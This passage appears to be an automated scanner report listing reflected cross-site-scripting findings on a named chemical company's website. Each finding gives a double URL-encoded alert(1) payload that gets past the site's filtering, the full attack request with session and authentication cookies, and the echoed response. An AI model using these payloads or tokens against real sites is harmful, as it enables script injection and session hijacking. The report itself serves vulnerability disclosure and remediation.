Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:21 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries/united-states438be";alert(1)//5ccf57b4760/press-releases/biodegradable-polymers","E404") ;
   </script>
...[SNIP]...

1.264. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/biodegradable-polymers [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/biodegradable-polymers

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d82a%2522%253balert%25281%2529%252f%252f9033127b06c was submitted in the REST URL parameter 5. This input was echoed as 9d82a";alert(1)//9033127b06c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries/united-states/press-releases9d82a%2522%253balert%25281%2529%252f%252f9033127b06c/biodegradable-polymers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:27 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries/united-states/press-releases9d82a";alert(1)//9033127b06c/biodegradable-polymers","E404") ;
   </script>
...[SNIP]...

1.265. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/biodegradable-polymers [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/biodegradable-polymers

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c98d8%2522%253balert%25281%2529%252f%252f2d9fa9f2058 was submitted in the REST URL parameter 6. This input was echoed as c98d8";alert(1)//2d9fa9f2058 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries/united-states/press-releases/biodegradable-polymersc98d8%2522%253balert%25281%2529%252f%252f2d9fa9f2058 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:36 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries/united-states/press-releases/biodegradable-polymersc98d8";alert(1)//2d9fa9f2058","E404") ;
   </script>
...[SNIP]...

1.266. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/safc-corporate-logo [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/safc-corporate-logo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ef92%2522%253balert%25281%2529%252f%252fb0e60677ef3 was submitted in the REST URL parameter 1. This input was echoed as 1ef92";alert(1)//b0e60677ef3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc1ef92%2522%253balert%25281%2529%252f%252fb0e60677ef3/medialib/countries/united-states/press-releases/safc-corporate-logo HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:04 GMT
Content-Length: 28975
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc1ef92";alert(1)//b0e60677ef3/medialib/countries/united-states/press-releases/safc-corporate-logo","E404") ;
   </script>
...[SNIP]...

1.267. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/safc-corporate-logo [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/safc-corporate-logo

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48eb3%2522%253balert%25281%2529%252f%252f508adc6d619 was submitted in the REST URL parameter 2. This input was echoed as 48eb3";alert(1)//508adc6d619 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib48eb3%2522%253balert%25281%2529%252f%252f508adc6d619/countries/united-states/press-releases/safc-corporate-logo HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:09 GMT
Content-Length: 28975
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib48eb3";alert(1)//508adc6d619/countries/united-states/press-releases/safc-corporate-logo","E404") ;
   </script>
...[SNIP]...

1.268. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/safc-corporate-logo [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/safc-corporate-logo

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7986%2522%253balert%25281%2529%252f%252f31940e1e566 was submitted in the REST URL parameter 3. This input was echoed as d7986";alert(1)//31940e1e566 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countriesd7986%2522%253balert%25281%2529%252f%252f31940e1e566/united-states/press-releases/safc-corporate-logo HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
